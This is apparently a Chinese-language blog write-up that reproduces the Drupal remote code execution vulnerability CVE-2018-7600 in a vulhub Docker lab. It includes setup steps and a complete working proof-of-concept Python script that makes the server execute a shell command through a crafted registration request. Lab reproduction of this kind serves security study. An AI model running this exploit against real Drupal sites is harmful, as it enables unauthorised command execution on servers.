首页 > 其他分享 >远程代码执行CVE-2018-7600

远程代码执行CVE-2018-7600

时间:2024-05-22 18:56:11浏览次数:20  
标签:proxies verify 代码执行 https print docker CVE 2018

最近打的靶场不约而同地都用到了这个漏洞

好好复现下,主要针对的是Drupal的cms框架

漏洞环境搭建

主要利用vulhub漏洞靶场的环境搭建,建议docker配一个阿里云的镜像加速器,不然的话拉取镜像的时间会很久

在/etc/docker下创建一个daemon.json文件

写入

{
"registry-mirrors":["https://6kx4zyno.mirror.aliyuncs.com"]
}

之后使用

systemctl daemon-reload(重载文件)

systemctl restart docker(重启docker服务)

发现使用docker-compose up -d命令可以迅速搭建好漏洞环境,一般在半分钟之内

启动docker容器

访问8080端口

安装完成

漏洞利用

 1 import sys
 2 import requests
 3 
 4 print ('################################################################')
 5 print ('# Proof-Of-Concept for CVE-2018-7600')
 6 print ('# by Vitalii Rudnykh')
 7 print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
 8 print ('# https://github.com/a2u/CVE-2018-7600')
 9 print ('################################################################')
10 print ('Provided only for educational or information purposes\n')
11 
12 target = input('Enter target url (example: https://domain.ltd/): ')
13 
14 # Add proxy support (eg. BURP to analyze HTTP(s) traffic)
15 # set verify = False if your proxy certificate is self signed
16 # remember to set proxies both for http and https
17 # 
18 # example:
19 #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 #verify = False
21 proxies = {}
22 verify = True
23 
24 url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
25 payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
26 #发送恶意代码
27 r = requests.post(url, proxies=proxies, data=payload, verify=verify)
28 #验证
29 check = requests.get(target + 'hello.txt', proxies=proxies, verify=verify)
30 if check.status_code != 200:
31   sys.exit("Not exploitable")
32 print ('\nCheck: '+target+'hello.txt')

发现在网站服务器上的确存在hello.txt(说明代码已经被执行)

参考文章

https://blog.csdn.net/qq_51295677/article/details/131975245

https://blog.nsfocus.net/cve-2018-7600-analysis/

https://xz.aliyun.com/t/2271?time__1311=n4%2BxnieDq7qCqAKDtKDsf32r7GO7DgD3oggYD

https://paper.seebug.org/567/

 

 

标签:proxies,verify,代码执行,https,print,docker,CVE,2018
From: https://www.cnblogs.com/zyToJH/p/18205884

相关文章

  • P8675 [蓝桥杯 2018 国 B] 搭积木
    原题链接题解1.请务必读清题干意思2.如果以最顶端积木的位置为状态,是可以穷尽所有情况的,则状态为\(dp[i][l][r]\),最顶端第\(i\)层只在区间\([l,r]\)内连续放置积木有几种方法3.状态转移方程$dp[i][l][r]=\sum_1^l\sum_r^mdp[i+1][x][y]$把\(x,y\)看成二维坐标上......
  • Mac install omicverse second time
    安装老版本的omicverse后发现scvelomodule缺少,再单独安装scvelo,更新了一些包后ov不能用了,于是重新安装!幸好mac的conda安装非常友好按照安装文档https://omicverse.readthedocs.io/en/latest/Installation_guild/#4-after-the-installation-of-pytorch-we-can-start-to-install-......
  • CVE-2016-3088
    ActiveMQ任意文件写入漏洞(CVE-2016-3088)环境搭建cdvulhub/activemq/CVE-2016-3088docker-composebuilddocker-composeup-d环境监听61616端口和8161端口,其中8161为web控制台端口,本漏洞就出现在web控制台中。访问http://10.10.10.8:8161/看到web页面,说明环境已成功运行。......
  • MacBook安装omicverse
    1)根据oneclick部分安装condacreate-nomicversepython=3.10condaactivateomicversecondainstallmamba-cconda-forgemambainstalljaxjaxlib-cconda-forgepip3installtorchtorchvisiontorchaudiopip3installtorch_geometric安装pyg_lib卡住2)根据说明......
  • 洛谷 P4383 [八省联考 2018] 林克卡特树
    原题等价于在树上选出\(k+1\)条不相交链,最大化边权和。树形DP。设\(f_{u,k,0/1/2}\)表示在\(u\)的子树中选了\(k\)条链,\(u\)的度数为\(0,1,2\)的最大边权和。注意到状态里缺了链退化为单个点的情况,可以把它放到\(f_{u,k,2}\)中(相当于自环)。转移时分讨一......
  • CVE-2017-2824
    ZabbixServertrapper命令注入漏洞(CVE-2017-2824)Zabbix是由AlexeiVladishev开发的一种网络监视、管理系统,基于Server-Client架构。其Server端trappercommand功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbixproxy发起请求......
  • 2018元旦快乐!嘿嘿嘿……
    Tips:当你看到这个提示的时候,说明当前的文章是由原emlog博客系统搬迁至此的,文章发布时间已过于久远,编排和内容不一定完整,还请谅解`2018元旦快乐!嘿嘿嘿……日期:2018-1-1阿珏谈天说地浏览:2057次评论:0条emmm~首先跟来访的朋友们说声元旦快乐!新年快乐!狗年......
  • F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750)
    漏洞描述该漏洞是一个影响F-logicDataCube3v1.0的SQL注入漏洞,这个漏洞源于'req_id'参数的用户输入没有得到适当的清理或过滤。通过在'req_id'参数中注入恶意的SQL代码,远程攻击者可以执行任意SQL命令,从而可能访问、修改或删除数据库中的敏感信息Fofa:title=="DataCube3"POC:P......
  • Weblogic T3反序列化漏洞(CVE-2018-2628)
    目录前言T3协议概述漏洞复现修复方案前言WebLogicServer是一个企业级的应用服务器,由Oracle公司开发,支持完整的JavaEE规范,包括EJB、JSP、Servlet、JMS等,适合大型分布式应用和高负载场景。T3协议概述T3协议(Two-TierTCP/IPProtocol),是WebLogic中的一种专有协议,建立在TCP/IP协......
  • CVE-2018-2628
    WeblogicWLSCoreComponents反序列化命令执行漏洞(CVE-2018-2628)Oracle2018年4月补丁中,修复了WeblogicServerWLSCoreComponents中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。漏洞环境cdweblogic/CVE-2018-2......